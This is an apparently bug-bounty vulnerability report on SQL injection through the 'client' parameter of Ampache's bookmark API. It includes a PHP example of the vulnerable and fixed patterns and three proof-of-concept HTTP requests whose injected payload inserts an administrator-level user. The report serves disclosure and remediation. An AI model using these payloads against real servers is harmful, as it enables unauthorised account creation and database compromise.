SQL Injection in ampache/ampache

Valid

Reported on

Oct 15th 2021
Description

The application does not validate or escape the client parameter before using it in a SQL statement in the get_bookmark function in Repository/Model/Bookmark.php, leading to SQL injection. get_bookmark is called from three API functions: bookmark_create, bookmark_edit and bookmark_delete. Each of them takes the value straight from the $input['client'] parameter without validation and passes it on to get_bookmark.
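The following is an added illustration of the code pattern the description refers to; it is not Ampache's own code and does not reproduce the real get_bookmark signature or schema. It places a lookup that interpolates the client value into the SQL text (the vulnerable shape) beside the same lookup with bound parameters, plus an input check a reviewer would ask for on $input['client']. It uses PDO with an in-memory SQLite database so it runs stand-alone; the table, rows, function names and the client-identifier pattern are assumptions made for the example.

```php
<?php
// Added example, not Ampache's code: reconstructs the vulnerable pattern from
// the report and shows the parameterised fix beside it. Schema and rows are
// constructed for the demonstration only.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE bookmark (id INTEGER PRIMARY KEY, object_type TEXT, object_id INTEGER, client TEXT)');
$db->exec("INSERT INTO bookmark (object_type, object_id, client) VALUES ('song', 1, 'web')");

// Vulnerable shape (hypothetical name): $client is spliced into the SQL text,
// so a single quote inside it ends the literal and the rest is parsed as SQL.
function get_bookmark_vulnerable(PDO $db, string $type, int $objectId, string $client): array
{
    $sql = "SELECT id FROM bookmark WHERE object_type = '$type' AND object_id = $objectId AND client = '$client'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Fixed shape (hypothetical name): every caller-controlled value is bound, so
// the database compares it as data and never re-parses it as SQL.
function get_bookmark_fixed(PDO $db, string $type, int $objectId, string $client): array
{
    $stmt = $db->prepare('SELECT id FROM bookmark WHERE object_type = ? AND object_id = ? AND client = ?');
    $stmt->execute([$type, $objectId, $client]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Defence in depth for the API layer: reject anything that does not look like a
// client identifier before it reaches a query. The pattern is an assumption for
// this example, not Ampache's rule.
function validate_client(string $client): string
{
    if (!preg_match('/^[A-Za-z0-9_.-]{1,64}$/', $client)) {
        throw new InvalidArgumentException('invalid client identifier');
    }
    return $client;
}

// A client value carrying a quote, standing in for the decoded "client"
// parameter in the report (a harmless tautology instead of the report's payload).
$hostile = "web' OR '1'='1";

printf("vulnerable: %s\n", json_encode(get_bookmark_vulnerable($db, 'song', 1, $hostile)));
printf("fixed:      %s\n", json_encode(get_bookmark_fixed($db, 'song', 1, $hostile)));

try {
    validate_client($hostile);
} catch (InvalidArgumentException $e) {
    printf("validation: rejected (%s)\n", $e->getMessage());
}
```

Run with `php example.php` (needs the pdo_sqlite extension). The vulnerable function returns the existing bookmark because the quote turns the client filter into a tautology, the fixed function returns no row because the whole string is compared literally, and the validator rejects the value before any query is built. Binding is the fix; the validator only narrows what reaches the database.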

Proof of Concept

Example: add a new user named "inval1d":

Inject in bookmark_edit

GET /server/xml.server.php?action=bookmark_edit&auth=e545492334861dab126165bda968148a&filter=1&position=1&type=song&client=1%27%3b+INSERT+INTO+user+(username,access)+VALUES+(%27inval1d%27,%27100%27)%3b%27 HTTP/1.1
Host: 127.0.0.1:8002
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Referer: http://127.0.0.1:8002/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Inject in bookmark_create

GET /server/xml.server.php?action=bookmark_create&auth=49a468855c03e7ce5cdc6aa2d6df7a12&filter=1&position=1&type=song&client=1%27%3b+INSERT+INTO+user+(username,access)+VALUES+(%27inval1d%27,%27100%27)%3b%27 HTTP/1.1
Host: 127.0.0.1:8002
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Referer: http://127.0.0.1:8002/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Inject in bookmark_delete

GET /server/xml.server.php?action=bookmark_delete&auth=49a468855c03e7ce5cdc6aa2d6df7a12&filter=1&position=1&type=song&client=1%27%3b+INSERT+INTO+user+(username,access)+VALUES+(%27inval1d%27,%27100%27)%3b%27 HTTP/1.1
Host: 127.0.0.1:8002
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: text/html, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Referer: http://127.0.0.1:8002/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Impact

The vulnerability allows authenticated users to perform SQL injection. A successful attack may result in the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to the database, writing files to the server leading to remote code execution, or writing a script to extract data.

We have contacted a member of the ampache team and are waiting to hear back 2 months ago
lachlan validated this vulnerability a month ago
laladee has been awarded the disclosure bounty
The fix bounty is now up for grabs
lachlan confirmed that a fix has been merged on 55a523 a month ago
lachlan has been awarded the fix bounty
BookmarkEditMethod.php#L68 has been validated